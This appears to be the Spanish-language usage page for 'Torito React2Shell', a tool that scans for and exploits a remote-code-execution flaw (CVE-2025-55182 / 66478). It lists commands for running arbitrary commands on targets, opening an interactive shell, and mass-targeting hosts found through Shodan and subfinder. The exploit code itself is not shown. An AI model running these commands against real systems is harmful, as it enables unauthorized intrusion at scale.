
Torito React2Shell: Herramienta de Escaneo y Explotación (CVE-2025-55182 / 66478)
pip install -r requirements.txtPATH para --subfinder (instalar mediante Homebrew brew install subfinder o Go: go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest; proyecto: https://github.com/projectdiscovery/subfinder)pip install shodan (ya incluido en requirements) y una clave: export SHODAN_API_KEY=... con créditos de consulta disponiblespython3 torito_r2s.py --help
Sondeo seguro (objetivo único)
python3 torito_r2s.py -u https://target.com
Confirmación de PoC (redirección por canal lateral)
python3 torito_r2s.py -u https://target.com --confirm
Explotación con comando personalizado
python3 torito_r2s.py -u https://target.com --exploit-cmd "whoami"
Shell interactivo en el primer acierto
python3 torito_r2s.py -u https://target.com --shell
Escaneo de lista con exportaciones
python3 torito_r2s.py -l hosts.txt -t 40 --confirm --json-out results.json --csv-out results.csv
Solo Shodan (requiere clave y créditos)
export SHODAN_API_KEY=your_key
python3 torito_r2s.py --shodan 'http.title:"Next.js"' --shodan-limit 50 --confirm
Solo Subfinder
python3 torito_r2s.py --subfinder target.com --confirm
Proxy (Burp/Caido)
python3 torito_r2s.py -u https://target.com --proxy http://127.0.0.1:8080 --confirm
Tubería mediante stdin
cat urls.txt | python3 torito_r2s.py --confirm
--exploit-cmd o --shell.| Bandera | Descripción | Predeterminado |
|---|
-u, --url URL | URL de un solo objetivo | — |
-l, --list FILE | Archivo con objetivos (uno por línea) | — |
--subfinder DOMAIN | Ejecutar subfinder para el dominio y añadir resultados | — |
--shodan QUERY | Búsqueda en Shodan (requiere SHODAN_API_KEY con créditos) | — |
--shodan-limit N | Máximo de resultados de Shodan por consulta | 100 |
-t, --threads N | Concurrencia | 20 |
--timeout SEC | Tiempo de espera de solicitud | 10 |
--proxy URL | Proxy HTTP/HTTPS | — |
--confirm | Ejecutar PoC basado en redirección después del sondeo | desactivado |
--exploit-cmd "CMD" | Ejecutar payload de RCE con comando | — |
--shell, -i | Abrir shell interactivo en el primer éxito de explotación (comando predeterminado id) | desactivado |
--json-out FILE | Guardar resultados JSON | — |
--csv-out FILE | Guardar resultados CSV | — |
-v, --verbose | Mostrar salidas/resúmenes decodificados en la tabla | desactivado |